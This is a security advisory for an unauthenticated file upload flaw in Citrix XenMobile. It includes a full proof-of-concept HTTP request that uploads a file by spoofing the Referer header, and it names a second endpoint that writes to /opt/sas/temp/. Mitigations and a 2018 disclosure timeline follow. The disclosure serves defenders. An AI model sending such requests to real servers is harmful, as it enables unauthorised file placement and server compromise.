Advisory

Overview

It is possible to upload a file to the XenMobile server without authentication by making a request to /ControlPoint/upload that includes a Referer header claiming that the request was referred from the application’s domain.

Proof of concept

Make the following request to the API:

    POST /ControlPoint/upload HTTP/1.1
    Host: xenmobile.example.com
    Referer: https://xenmobile.example.com/index_uc.html
    Content-Type: multipart/form-data; boundary=MultipartBoundry
    Connection: close
    Content-Length: 239

    --MultipartBoundry
    Content-Disposition: form-data; name="image"; filename="FILENAME_HERE"

    [content of file]
    --MultipartBoundry--

There are several other API endpoints that also provide this file upload functionality without authentication. For example, the /zdm/rs/xdmServices/devicepolicy/fileUpload endpoint accepts JSON data and writes it to files under /opt/sas/temp/. This functionality chooses a random filename, but then discloses that filename to the caller.

Mitigation/further actions

1. Remove public access to this service by moving it inside your network and configuring mobile devices to access it via a VPN or proxy that requires authentication
2. Install an update rectifying this issue as soon as one is available

Advisory timeline

1. 2018-03-28 – Reported to Citrix and acknowledged immediately
2. 2018-05-21 – Issue reported fixed